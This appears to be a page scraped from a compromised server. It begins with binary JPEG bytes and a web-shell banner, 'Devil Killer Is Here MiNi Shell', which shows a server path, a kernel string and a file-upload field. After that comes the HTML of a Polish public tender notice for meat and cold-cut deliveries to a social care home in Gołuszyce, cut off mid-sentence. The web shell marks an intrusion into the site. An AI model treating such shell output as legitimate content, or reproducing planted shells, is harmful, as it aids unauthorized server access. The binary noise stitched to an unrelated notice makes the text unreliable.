JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221207/0048191001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy mięsa i wędlin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT ŚWIECKI - DOM POMOCY SPOŁECZNEJ GOŁUSZYCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000295343</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołuszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523320019</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523320019</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dps.radecki@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dps-goluszyce.rbip.mojregion.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy mięsa i wędlin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c112c57-761f-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00481910</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023514/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawy mięsa i wędlin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/701465 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://platformazakupowa.pl/transakcja/701465 zwanej dalej Platformą. <br/>2.	Oferta oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane podpisem kwalifikowanym elektronicznym, podpisem zaufanym lub podpisem osobistym. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy dostępne są pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego. Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisem kwalifikowanym elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. <br/>4.	Zamawiający określa wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie https://platforma zakupowa.pl:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>2)	komputer klasy PC lub MAC, dowolny system operacyjny wersji umożliwiającej zainstalowanie do-wolnej przeglądarki internetowej z włączoną obsługą języka JavaScript, akceptującej pliki typu „coo-kies”,<br/>3)	wyświetlacz ekranowy umożliwiający pracę w rozdzielczości nie niższej niż 1024x768 pikseli,<br/>4)	zainstalowane oprogramowanie do odczytu plików w formacie .pdf.<br/>5)	szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>6)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. <br/>5.	Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: .pdf. <br/>6.	Zalecenia <br/>Szczegółowe zalecenia zawiera SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	W związku z realizacją wymogów Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO”), informujemy, że:<br/>2)	Administrator danych:<br/>Administratorem Pani/Pana danych osobowych przetwarzanych w Domu Pomocy Społecznej w Gołuszycach jest Dyrektor Domu Pomocy Społecznej. Dane adresowe: Gołuszyce 26, 86-120 Pruszcz. Telefon: 523320019. Adres e-mail: dpsgol@wp.pl<br/>3)	Inspektor Ochrony Danych:<br/>W sprawach związanych z ochroną danych osobowych może Pani/Pan kontaktować się z Inspektorem Ochrony Danych drogą elektroniczną: daneosobowe@csw.pl; pisemnie: na adres siedziby Administratora danych. <br/>4)	Cele przetwarzania danych osobowych oraz podstawa prawna przetwarzania danych osobowych Pani/Pana dane osobowe przetwarzane będą w celu realizacji zadań i obowiązków prawnych nałożonych na Administratora ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (dalej: ustawa PZP), tj. w celu udzielenia zamówienia publicznego, zawarcia i wykonania umowy na podstawie art. 6 ust. 1 lit. c rozporządzenia RODO.<br/>5)	Odbiorcy danych osobowych:<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>•	wszystkie zainteresowane podmioty i osoby, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne (zgodnie z art. 18 oraz 74 ustawy PZP);<br/>•	na potrzeby kontroli przebiegu zamówienia publicznego, w szczególności przez odpowiednio wymienione: Urząd Zamówień Publicznych, Komisja Rewizyjna, Urząd Kontroli Skarbowej, Regionalna Izba Obrachunkowa, Urząd Skarbowy, ZUS, UOKIK, NIK, Urząd Marszałkowski, Urząd Wojewódzki i inne działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa; <br/>•	inne podmioty, które na podstawie stosownych umów podpisanych z Administratorem przetwarzają dane osobowe.<br/>6)	Okres przechowywania danych osobowych:<br/>Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, oraz nie krócej niż przez okres przewidziany w instrukcji kancelaryjnej, stanowiącej załącznik nr 1 do rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt, instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, tj. w przypadku umów przez okres 10 lat od dnia zakończenia postępowania o udzielenie zamówienia oraz w przypadku dokumentacji zamówienia przez okres 5 lat.<br/>7)	Prawa osób, których dane dotyczą:<br/>W związku z przetwarzaniem Pani/Pana danych osobowych:<br/>a.	przysługują Pani/Panu następujące uprawnienia: <br/>b)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>c)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ,<br/>d)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ,<br/>a.	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8)	Prawo wniesienia skargi do organu nadzorczego:<br/>Z powodu ograniczonej ilosci znaków pozostałe informacje znajduja sie w dziale XXIX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DF/2236/01ZP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 175622,18 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są Dostawy mięsa i wędlin dla Domu Pomocy Społecznej w<br/>Gołuszycach<br/>w ilościach określonych przez Zamawiającego w zestawieniu ilościowo – wartościowym<br/>stanowiącym załącznik do niniejszej specyfikacji. (załącznik 2)<br/>Zamówienie obejmuje sukcesywne dostawy mięsa i wędlin według zamówień składanych przez<br/>Zamawiającego, do magazyn żywności w siedzibie Zamawiającego, w okresie 12 miesięcy od<br/>dnia podpisania umowy. Zamówiony towar należy dostarczyć i wyładować siłami i na koszt<br/>wykonawcy do magazynu zamawiającego.<br/>Dostawy odbywać się będą codziennie od poniedziałku do piątku w godzinach między 7:30 a<br/>8:30 rano, na podstawie zamówień telefonicznych składanych w dniu poprzednim. Zamawiający<br/>zastrzega sobie prawo zamówienia każdej minimalnej partii towaru i nie określa się żadnej<br/>minimalnej ilości ani wartości jednorazowej dostawy. Zamawiający zastrzega sobie prawo do<br/>zamawiania poszczególnych asortymentów z dokładnością do 0,1kg. Dostarczane mięso i<br/>wędliny muszą być świeże, nie mrożone, pozbawione obcych zapachów, uszkodzeń osłonek,<br/>opakowań, bez nalotów, zasinienia, zazielenienia, bez lepkości. Organoleptycznie bez zarzutu.<br/>Wyprodukowane i dostarczone zgodnie z wymogami SANEPIDU i systemu HACCAP i zgodnie z<br/>przepisami weterynaryjnymi PIW. Przedmiot zamówienia przedstawiony w ofercie winien być<br/>zgodny z Polskimi Normami. Każdy dostarczony asortyment, każda partia dostawy musi być<br/>dostarczona w oryginalnych nieuszkodzonych opakowaniach opatrzonych datą przydatności do<br/>spożycia, nazwą, składem surowcowym, nazwą i adresem producenta, w języku polskim. Nie<br/>dopuszcza się dostarczania towaru, którego termin przydatności do spożycia jest bliski dacie<br/>dostawy. Wykonawca musi posiadać wszelkie przewidziane prawem dokumenty weterynaryjne<br/>na pochodzenie i ubój zwierząt, które zostały wykorzystane do przygotowania asortymentu<br/>dostawy i udostępnić je na żądanie Zamawiającego lub służb do tego uprawnionych. Asortyment<br/>mięsa nie może być pozyskany ze sztuk chorych. W wędlinach oznaczonych w zestawieniu<br/>ilościowo wartościowym nie dopuszcza się obecności MOM – mięsa oddzielonego<br/>mechanicznie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112000-6 - Drób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający<br/>stosować będzie następujące kryteria oceny ofert:<br/>Kryterium: cena brutto – maksymalna ilość punktów wynosi 100.<br/>Zastosowanie będzie miał następujący wzór, wykorzystywany przy ocenie oferty:<br/>C=(cena brutto najniższej oferty*)/(cena brutto badanej oferty)×100<br/>*spośród ofert niepodlegających odrzuceniu<br/>Zamawiający udzieli zamówienia wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz<br/>otrzyma największą liczbę punktów spośród rozpatrywanych ofert za realizację przedmiotu zamówienia.<br/>Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu, zamawiający spośród tych ofert wybierze ofertę z<br/>najniższą ceną lub najniższym kosztem, a jeżeli zostały złożone oferty o takiej samej cenie lub koszcie,<br/>zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>zamawiającego ofert dodatkowych.<br/>Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen lub kosztów wyższych niż<br/>zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w<br/>postępowaniu stanowiące załącznik nr 2 do SWZ. Oświadczenie to stanowi dowód potwierdzający brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert,<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej jednym z wymaganych podpisów.<br/>Oświadczenie składają: wykonawca/każdy spośród wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu stanowiące załącznik nr 2 do SWZ. Oświadczenie to stanowi dowód potwierdzający brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert,<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej jednym z wymaganych podpisów.<br/>Oświadczenie składają: wykonawca/każdy spośród wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Etykiety oferowanych produktów <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Etykiety oferowanych produktów <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>oświadczenie/oświadczenia Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia/podmiotów udostępniających zasoby o niepodleganiu wykluczeniu, spełnianiu<br/>warunków udziału w postępowaniu - wypełnione zgodnie z Załącznikiem nr 2 do SWZ.<br/>dokumenty, z których wynika prawo do podpisania oferty; może być uwierzytelniona przez<br/>upełnomocnionego.<br/>w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (np. konsorcjum) do oferty powinno zostać załączone pełnomocnictwo dla Osoby<br/>Uprawnionej do reprezentowania wykonawców w postępowaniu albo do reprezentowania<br/>wykonawców w postępowaniu i zawarcia umowy.<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, jeżeli Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia polegając na zdolnościach tych Wykonawców, którzy wykonają<br/>dostawy, do realizacji których te zdolności są wymagane.<br/>oświadczenia i/lub dokumenty na podstawie których, zamawiający dokona oceny skuteczności<br/>zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w<br/>rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (jeżeli Wykonawca zastrzega takie<br/>informacje).<br/>podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające<br/>umocowanie do reprezentowania.<br/>Pełnomocnictwo<br/>a) Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty<br/>dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania umowy.<br/>b) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem kwalifikowanym elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za<br/>zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem<br/>elektronicznym notariusza.<br/>Formularz oferty (załącznik nr 1 do SWZ)<br/>Wymagana forma:<br/>Formularz musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem kwalifikowanym elektronicznym, podpisem zaufanym lub podpisem osobistym osoby<br/>upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w<br/>dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. Do oferty<br/>załącza się 